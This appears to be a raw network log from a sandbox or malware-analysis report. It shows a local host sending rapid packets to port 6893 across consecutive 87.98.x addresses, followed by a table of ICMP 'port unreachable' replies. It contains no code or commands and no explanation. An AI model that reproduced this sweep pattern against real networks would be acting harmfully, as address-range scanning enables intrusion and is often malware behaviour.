                                                                                                                                                                                      Sep 29, 2022 14:50:37.178533077 CEST590846893192.168.2.687.98.178.248
                                                                                                                                                                                      Sep 29, 2022 14:50:37.178751945 CEST590846893192.168.2.687.98.178.249
                                                                                                                                                                                      Sep 29, 2022 14:50:37.178973913 CEST590846893192.168.2.687.98.178.250
                                                                                                                                                                                      Sep 29, 2022 14:50:37.179039001 CEST590846893192.168.2.687.98.178.251
                                                                                                                                                                                      Sep 29, 2022 14:50:37.179122925 CEST590846893192.168.2.687.98.178.252
                                                                                                                                                                                      Sep 29, 2022 14:50:37.179243088 CEST590846893192.168.2.687.98.178.253
                                                                                                                                                                                      Sep 29, 2022 14:50:37.179358006 CEST590846893192.168.2.687.98.178.254
                                                                                                                                                                                      Sep 29, 2022 14:50:48.130058050 CEST590846893192.168.2.687.98.178.255
                                                                                                                                                                                      Sep 29, 2022 14:50:48.130131006 CEST590846893192.168.2.687.98.179.0
                                                                                                                                                                                      Sep 29, 2022 14:50:48.130291939 CEST590846893192.168.2.687.98.179.1
                                                                                                                                                                                      Sep 29, 2022 14:50:48.130378008 CEST590846893192.168.2.687.98.179.2
                                                                                                                                                                                      Sep 29, 2022 14:50:48.132759094 CEST590846893192.168.2.687.98.179.3
                                                                                                                                                                                      Sep 29, 2022 14:50:48.132872105 CEST590846893192.168.2.687.98.179.4
                                                                                                                                                                                      Sep 29, 2022 14:50:48.132958889 CEST590846893192.168.2.687.98.179.5
                                                                                                                                                                                      Sep 29, 2022 14:50:48.133116007 CEST590846893192.168.2.687.98.179.6
                                                                                                                                                                                      Sep 29, 2022 14:50:48.140396118 CEST590846893192.168.2.687.98.179.7
                                                                                                                                                                                      Sep 29, 2022 14:50:48.140505075 CEST590846893192.168.2.687.98.179.8
                                                                                                                                                                                      Sep 29, 2022 14:50:48.140589952 CEST590846893192.168.2.687.98.179.9
                                                                                                                                                                                      Sep 29, 2022 14:50:48.140661955 CEST590846893192.168.2.687.98.179.10
                                                                                                                                                                                      Sep 29, 2022 14:50:48.140774965 CEST590846893192.168.2.687.98.179.11
                                                                                                                                                                                      Sep 29, 2022 14:50:48.140819073 CEST590846893192.168.2.687.98.179.12
                                                                                                                                                                                      Sep 29, 2022 14:50:48.140896082 CEST590846893192.168.2.687.98.179.13
                                                                                                                                                                                      Sep 29, 2022 14:50:48.140960932 CEST590846893192.168.2.687.98.179.14
                                                                                                                                                                                      Sep 29, 2022 14:50:48.141035080 CEST590846893192.168.2.687.98.179.15
                                                                                                                                                                                      Sep 29, 2022 14:50:48.141226053 CEST590846893192.168.2.687.98.179.16
                                                                                                                                                                                      Sep 29, 2022 14:50:48.141334057 CEST590846893192.168.2.687.98.179.17
                                                                                                                                                                                      Sep 29, 2022 14:50:48.141488075 CEST590846893192.168.2.687.98.179.18
                                                                                                                                                                                      Sep 29, 2022 14:50:48.141590118 CEST590846893192.168.2.687.98.179.19
                                                                                                                                                                                      Sep 29, 2022 14:50:48.141666889 CEST590846893192.168.2.687.98.179.20
                                                                                                                                                                                      Sep 29, 2022 14:50:48.141851902 CEST590846893192.168.2.687.98.179.22
                                                                                                                                                                                      Sep 29, 2022 14:50:48.254163980 CEST590846893192.168.2.687.98.179.166
                                                                                                                                                                                      Sep 29, 2022 14:50:48.254221916 CEST590846893192.168.2.687.98.179.167
                                                                                                                                                                                      Sep 29, 2022 14:50:48.254302979 CEST590846893192.168.2.687.98.179.168
                                                                                                                                                                                      Sep 29, 2022 14:50:48.254703999 CEST590846893192.168.2.687.98.179.170
                                                                                                                                                                                      Sep 29, 2022 14:50:48.254920959 CEST590846893192.168.2.687.98.179.169
                                                                                                                                                                                      Sep 29, 2022 14:50:48.255009890 CEST590846893192.168.2.687.98.179.171
                                                                                                                                                                                      Sep 29, 2022 14:50:48.255057096 CEST590846893192.168.2.687.98.179.172
                                                                                                                                                                                      Sep 29, 2022 14:50:48.255182981 CEST590846893192.168.2.687.98.179.173
                                                                                                                                                                                      Sep 29, 2022 14:50:48.255316973 CEST590846893192.168.2.687.98.179.174
                                                                                                                                                                                      Sep 29, 2022 14:50:48.256685972 CEST590846893192.168.2.687.98.179.175
                                                                                                                                                                                      Sep 29, 2022 14:50:48.256999969 CEST590846893192.168.2.687.98.179.176
                                                                                                                                                                                      Sep 29, 2022 14:50:48.257129908 CEST590846893192.168.2.687.98.179.177
                                                                                                                                                                                      Sep 29, 2022 14:50:48.257272005 CEST590846893192.168.2.687.98.179.178
                                                                                                                                                                                      Sep 29, 2022 14:50:48.258483887 CEST590846893192.168.2.687.98.179.179
                                                                                                                                                                                      Sep 29, 2022 14:50:48.258982897 CEST590846893192.168.2.687.98.179.180
                                                                                                                                                                                      Sep 29, 2022 14:50:48.259155989 CEST590846893192.168.2.687.98.179.181
                                                                                                                                                                                      Sep 29, 2022 14:50:48.259277105 CEST590846893192.168.2.687.98.179.182
                                                                                                                                                                                      Sep 29, 2022 14:50:48.259618044 CEST590846893192.168.2.687.98.179.183
                                                                                                                                                                                      Sep 29, 2022 14:50:48.259618044 CEST590846893192.168.2.687.98.179.184
                                                                                                                                                                                      Sep 29, 2022 14:50:48.259732008 CEST590846893192.168.2.687.98.179.185
                                                                                                                                                                                      Sep 29, 2022 14:50:48.259921074 CEST590846893192.168.2.687.98.179.186
                                                                                                                                                                                      Sep 29, 2022 14:50:48.260075092 CEST590846893192.168.2.687.98.179.187
                                                                                                                                                                                      Sep 29, 2022 14:50:48.260215044 CEST590846893192.168.2.687.98.179.188
                                                                                                                                                                                      Sep 29, 2022 14:50:48.260391951 CEST590846893192.168.2.687.98.179.189
                                                                                                                                                                                      Sep 29, 2022 14:50:48.260541916 CEST590846893192.168.2.687.98.179.190
                                                                                                                                                                                      Sep 29, 2022 14:50:48.260739088 CEST590846893192.168.2.687.98.179.191
                                                                                                                                                                                      Sep 29, 2022 14:50:48.260885000 CEST590846893192.168.2.687.98.179.192
                                                                                                                                                                                      Sep 29, 2022 14:50:48.261079073 CEST590846893192.168.2.687.98.179.193
                                                                                                                                                                                      Sep 29, 2022 14:50:48.261229992 CEST590846893192.168.2.687.98.179.194
                                                                                                                                                                                      Sep 29, 2022 14:50:48.261409998 CEST590846893192.168.2.687.98.179.195
                                                                                                                                                                                      Sep 29, 2022 14:50:48.261595011 CEST590846893192.168.2.687.98.179.196
                                                                                                                                                                                      Sep 29, 2022 14:50:48.261770010 CEST590846893192.168.2.687.98.179.197
                                                                                                                                                                                      Sep 29, 2022 14:50:48.263001919 CEST590846893192.168.2.687.98.179.198
                                                                                                                                                                                      Sep 29, 2022 14:50:48.263103008 CEST590846893192.168.2.687.98.179.199
                                                                                                                                                                                      Sep 29, 2022 14:50:48.263222933 CEST590846893192.168.2.687.98.179.200
                                                                                                                                                                                      Sep 29, 2022 14:50:48.263585091 CEST590846893192.168.2.687.98.179.202
                                                                                                                                                                                      Sep 29, 2022 14:50:48.263808012 CEST590846893192.168.2.687.98.179.201
                                                                                                                                                                                      Sep 29, 2022 14:50:48.263972044 CEST590846893192.168.2.687.98.179.203
                                                                                                                                                                                      Sep 29, 2022 14:50:48.264214039 CEST590846893192.168.2.687.98.179.204
                                                                                                                                                                                      Sep 29, 2022 14:50:48.264415026 CEST590846893192.168.2.687.98.179.205
                                                                                                                                                                                      Sep 29, 2022 14:50:48.264590979 CEST590846893192.168.2.687.98.179.206
                                                                                                                                                                                      Sep 29, 2022 14:50:48.267945051 CEST590846893192.168.2.687.98.179.207
                                                                                                                                                                                      Sep 29, 2022 14:50:48.268424034 CEST590846893192.168.2.687.98.179.208
                                                                                                                                                                                      Sep 29, 2022 14:50:48.268600941 CEST590846893192.168.2.687.98.179.209
                                                                                                                                                                                      Sep 29, 2022 14:50:48.268728018 CEST590846893192.168.2.687.98.179.210
                                                                                                                                                                                      Sep 29, 2022 14:50:48.268817902 CEST590846893192.168.2.687.98.179.211
                                                                                                                                                                                      Sep 29, 2022 14:50:48.269071102 CEST590846893192.168.2.687.98.179.212
                                                                                                                                                                                      Sep 29, 2022 14:50:48.269216061 CEST590846893192.168.2.687.98.179.213
                                                                                                                                                                                      Sep 29, 2022 14:50:48.269464970 CEST590846893192.168.2.687.98.179.214
                                                                                                                                                                                      Sep 29, 2022 14:50:48.269670963 CEST590846893192.168.2.687.98.179.215
                                                                                                                                                                                      Sep 29, 2022 14:50:48.269787073 CEST590846893192.168.2.687.98.179.216
                                                                                                                                                                                      Sep 29, 2022 14:50:48.269864082 CEST590846893192.168.2.687.98.179.217
                                                                                                                                                                                      Sep 29, 2022 14:50:48.270011902 CEST590846893192.168.2.687.98.179.218
                                                                                                                                                                                      Sep 29, 2022 14:50:48.270176888 CEST590846893192.168.2.687.98.179.219
                                                                                                                                                                                      Sep 29, 2022 14:50:48.270345926 CEST590846893192.168.2.687.98.179.220
                                                                                                                                                                                      Sep 29, 2022 14:50:48.270509958 CEST590846893192.168.2.687.98.179.221
                                                                                                                                                                                      Sep 29, 2022 14:50:48.270646095 CEST590846893192.168.2.687.98.179.222
                                                                                                                                                                                      Sep 29, 2022 14:50:48.270827055 CEST590846893192.168.2.687.98.179.223
                                                                                                                                                                                      Sep 29, 2022 14:50:48.270948887 CEST590846893192.168.2.687.98.179.224
                                                                                                                                                                                      Sep 29, 2022 14:50:48.276830912 CEST590846893192.168.2.687.98.179.225
                                                                                                                                                                                      Sep 29, 2022 14:50:48.276961088 CEST590846893192.168.2.687.98.179.226
                                                                                                                                                                                      Sep 29, 2022 14:50:48.277101994 CEST590846893192.168.2.687.98.179.227
                                                                                                                                                                                      Sep 29, 2022 14:50:48.277235031 CEST590846893192.168.2.687.98.179.228
                                                                                                                                                                                      Sep 29, 2022 14:50:48.277360916 CEST590846893192.168.2.687.98.179.229
                                                                                                                                                                                      Sep 29, 2022 14:50:48.277498007 CEST590846893192.168.2.687.98.179.230
                                                                                                                                                                                      Sep 29, 2022 14:50:48.277575970 CEST590846893192.168.2.687.98.179.231
                                                                                                                                                                                      Sep 29, 2022 14:50:48.277699947 CEST590846893192.168.2.687.98.179.232
                                                                                                                                                                                      Sep 29, 2022 14:50:48.277843952 CEST590846893192.168.2.687.98.179.233
                                                                                                                                                                                      Sep 29, 2022 14:50:48.277992964 CEST590846893192.168.2.687.98.179.234
                                                                                                                                                                                      Sep 29, 2022 14:50:48.278099060 CEST590846893192.168.2.687.98.179.235
                                                                                                                                                                                      Sep 29, 2022 14:50:48.278204918 CEST590846893192.168.2.687.98.179.236
                                                                                                                                                                                      Sep 29, 2022 14:50:48.278306007 CEST590846893192.168.2.687.98.179.237
                                                                                                                                                                                      Sep 29, 2022 14:50:48.278417110 CEST590846893192.168.2.687.98.179.238
                                                                                                                                                                                      Sep 29, 2022 14:50:48.369240046 CEST590846893192.168.2.687.98.179.239
                                                                                                                                                                                      Sep 29, 2022 14:50:48.369446993 CEST590846893192.168.2.687.98.179.240
                                                                                                                                                                                      Sep 29, 2022 14:50:48.369517088 CEST590846893192.168.2.687.98.179.241
                                                                                                                                                                                      Sep 29, 2022 14:50:48.369595051 CEST590846893192.168.2.687.98.179.242
                                                                                                                                                                                      Sep 29, 2022 14:50:48.369678974 CEST590846893192.168.2.687.98.179.243
                                                                                                                                                                                      Sep 29, 2022 14:50:48.371186972 CEST590846893192.168.2.687.98.179.244
                                                                                                                                                                                      Sep 29, 2022 14:50:48.371354103 CEST590846893192.168.2.687.98.179.245
                                                                                                                                                                                      Sep 29, 2022 14:50:48.371454954 CEST590846893192.168.2.687.98.179.246
                                                                                                                                                                                      Sep 29, 2022 14:50:48.371587992 CEST590846893192.168.2.687.98.179.247
                                                                                                                                                                                      Sep 29, 2022 14:50:48.371711016 CEST590846893192.168.2.687.98.179.248
                                                                                                                                                                                      Sep 29, 2022 14:50:48.371864080 CEST590846893192.168.2.687.98.179.249
                                                                                                                                                                                      Sep 29, 2022 14:50:48.371957064 CEST590846893192.168.2.687.98.179.250
                                                                                                                                                                                      Sep 29, 2022 14:50:48.372101068 CEST590846893192.168.2.687.98.179.251
                                                                                                                                                                                      Sep 29, 2022 14:50:48.372235060 CEST590846893192.168.2.687.98.179.252
                                                                                                                                                                                      Sep 29, 2022 14:50:48.372349977 CEST590846893192.168.2.687.98.179.253
                                                                                                                                                                                      Sep 29, 2022 14:50:48.372488022 CEST590846893192.168.2.687.98.179.254
                                                                                                                                                                                      Sep 29, 2022 14:50:49.410053015 CEST590846893192.168.2.687.98.179.255
Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                                                                                                                                                                      Sep 29, 2022 14:50:24.600893021 CEST87.98.176.102192.168.2.6c79f(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.602725029 CEST87.98.176.113192.168.2.6c7b1(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.603183985 CEST87.98.176.114192.168.2.6c7b2(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.603202105 CEST87.98.176.116192.168.2.6c7b4(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.603399992 CEST87.98.176.110192.168.2.6c7ae(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.603429079 CEST87.98.176.151192.168.2.6c7d7(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.604213953 CEST87.98.176.117192.168.2.6c7ae(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.604566097 CEST87.98.176.122192.168.2.6c7ba(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.606057882 CEST87.98.176.124192.168.2.6c7bc(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.606158972 CEST87.98.176.130192.168.2.6c7c2(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.608103037 CEST87.98.176.190192.168.2.6c7fe(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.608273983 CEST87.98.176.142192.168.2.6c7ce(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.609436035 CEST87.98.176.147192.168.2.6c7d3(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.610559940 CEST87.98.176.200192.168.2.6c808(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.611068010 CEST87.98.176.150192.168.2.6c7d6(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.611282110 CEST87.98.176.158192.168.2.6c7de(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.611371040 CEST87.98.176.156192.168.2.6c7dc(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.612030029 CEST87.98.176.164192.168.2.6c7e4(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.612571955 CEST87.98.176.163192.168.2.6c7e3(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.612591982 CEST87.98.176.215192.168.2.6c817(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.613446951 CEST87.98.176.221192.168.2.6c81d(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.613466024 CEST87.98.176.171192.168.2.6c7eb(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.613569021 CEST87.98.176.169192.168.2.6c7e9(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.614437103 CEST87.98.176.185192.168.2.6c7f9(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.614460945 CEST87.98.176.178192.168.2.6c7f2(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.615144014 CEST87.98.176.184192.168.2.6c7f8(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.618052006 CEST87.98.176.196192.168.2.6c804(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.618185997 CEST87.98.176.193192.168.2.6c801(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.618427038 CEST87.98.176.203192.168.2.6c80b(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.619157076 CEST87.98.176.210192.168.2.6c812(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.619211912 CEST87.98.176.206192.168.2.6c80e(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.619461060 CEST87.98.176.195192.168.2.6c803(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.621149063 CEST87.98.176.219192.168.2.6c81b(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.621385098 CEST87.98.176.220192.168.2.6c81c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.621448994 CEST87.98.176.224192.168.2.6c820(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.621692896 CEST87.98.176.225192.168.2.6c821(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.622361898 CEST87.98.176.227192.168.2.6c819(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.631953955 CEST87.98.176.234192.168.2.6c82a(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.632549047 CEST87.98.176.236192.168.2.6c82c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.633186102 CEST87.98.176.239192.168.2.6c82f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.633479118 CEST87.98.176.241192.168.2.6c831(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.633593082 CEST87.98.176.242192.168.2.6c832(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.633624077 CEST87.98.176.243192.168.2.6c82c(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.633990049 CEST87.98.176.248192.168.2.6c838(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.634471893 CEST87.98.176.246192.168.2.6c82f(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:24.636595964 CEST87.98.176.254192.168.2.6c83e(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.666177988 CEST87.98.177.4192.168.2.6c844(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.666697979 CEST87.98.177.9192.168.2.6c849(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.667300940 CEST87.98.177.47192.168.2.6c86f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.667835951 CEST87.98.177.6192.168.2.6c846(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.667926073 CEST87.98.177.13192.168.2.6c84d(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.667952061 CEST87.98.177.21192.168.2.6c855(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.668597937 CEST87.98.177.23192.168.2.6c857(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.668628931 CEST87.98.177.20192.168.2.6c854(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.669507027 CEST87.98.177.26192.168.2.6c85a(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.670691013 CEST87.98.177.83192.168.2.6c893(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.671293974 CEST87.98.177.35192.168.2.6c863(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.671652079 CEST87.98.177.39192.168.2.6c867(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.671885967 CEST87.98.177.88192.168.2.6c898(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.674613953 CEST87.98.177.107192.168.2.6c8a1(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.674689054 CEST87.98.177.48192.168.2.6c870(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.675034046 CEST87.98.177.44192.168.2.6c86c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.675641060 CEST87.98.177.41192.168.2.6c869(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.675674915 CEST87.98.177.61192.168.2.6c876(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.675787926 CEST87.98.177.59192.168.2.6c87b(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.676136971 CEST87.98.177.63192.168.2.6c87f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.676364899 CEST87.98.177.62192.168.2.6c87e(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.676476002 CEST87.98.177.71192.168.2.6c887(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.676877022 CEST87.98.177.73192.168.2.6c889(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.676934958 CEST87.98.177.67192.168.2.6c883(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.677000046 CEST87.98.177.69192.168.2.6c885(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.677242994 CEST87.98.177.79192.168.2.6c88f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.677489996 CEST87.98.177.135192.168.2.6c8c7(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.677732944 CEST87.98.177.75192.168.2.6c88b(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.679265022 CEST87.98.177.81192.168.2.6c891(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.679286003 CEST87.98.177.86192.168.2.6c896(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.679569960 CEST87.98.177.89192.168.2.6c899(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.680358887 CEST87.98.177.92192.168.2.6c89c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.680382967 CEST87.98.177.95192.168.2.6c89f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.680433989 CEST87.98.177.96192.168.2.6c8a0(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.682312965 CEST87.98.177.108192.168.2.6c8ac(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.682553053 CEST87.98.177.116192.168.2.6c8b4(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.682748079 CEST87.98.177.102192.168.2.6c8a6(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.682775021 CEST87.98.177.109192.168.2.6c8ad(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.683510065 CEST87.98.177.115192.168.2.6c8b3(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.683907032 CEST87.98.177.110192.168.2.6c8ae(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.683974981 CEST87.98.177.126192.168.2.6c8be(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.684211016 CEST87.98.177.1192.168.2.6c841(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.684233904 CEST87.98.177.124192.168.2.6c8bc(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.685087919 CEST87.98.177.132192.168.2.6c8c4(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.685414076 CEST87.98.177.165192.168.2.6c8e5(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.687052011 CEST87.98.177.137192.168.2.6c8c9(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.687088966 CEST87.98.177.141192.168.2.6c8cd(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.687882900 CEST87.98.177.142192.168.2.6c8ce(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.689836979 CEST87.98.177.185192.168.2.6c8f9(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.690056086 CEST87.98.177.146192.168.2.6c8d2(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.691914082 CEST87.98.177.155192.168.2.6c8d4(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:25.691951036 CEST87.98.177.153192.168.2.6c8d9(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.930912018 CEST87.98.179.37192.168.2.6ca65(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.931113958 CEST87.98.179.34192.168.2.6ca62(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.931359053 CEST87.98.179.45192.168.2.6ca6d(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.931448936 CEST87.98.179.44192.168.2.6ca6c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.931935072 CEST87.98.179.41192.168.2.6ca69(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.932770967 CEST87.98.179.53192.168.2.6ca75(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.933013916 CEST87.98.179.51192.168.2.6ca73(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.933140993 CEST87.98.179.56192.168.2.6ca78(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.933660984 CEST87.98.179.50192.168.2.6ca72(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.933684111 CEST87.98.179.58192.168.2.6ca73(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.933764935 CEST87.98.179.54192.168.2.6ca76(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.934139013 CEST87.98.179.60192.168.2.6ca75(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.941443920 CEST87.98.179.82192.168.2.6ca8b(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.945266962 CEST87.98.179.106192.168.2.6caaa(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.945445061 CEST87.98.179.66192.168.2.6ca82(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.945952892 CEST87.98.179.70192.168.2.6ca86(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.946075916 CEST87.98.179.69192.168.2.6ca85(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.947901964 CEST87.98.179.78192.168.2.6ca8e(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.948648930 CEST87.98.179.76192.168.2.6ca8c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.949404001 CEST87.98.179.80192.168.2.6ca90(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.950901985 CEST87.98.179.93192.168.2.6ca9d(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.950989008 CEST87.98.179.96192.168.2.6caa0(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.951540947 CEST87.98.179.99192.168.2.6caa3(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.952107906 CEST87.98.179.105192.168.2.6caa9(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.953957081 CEST87.98.179.107192.168.2.6caab(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.953988075 CEST87.98.179.109192.168.2.6caa6(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.954008102 CEST87.98.179.104192.168.2.6caa8(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.954026937 CEST87.98.179.119192.168.2.6cab7(Port unreachable)Destination Unreachable
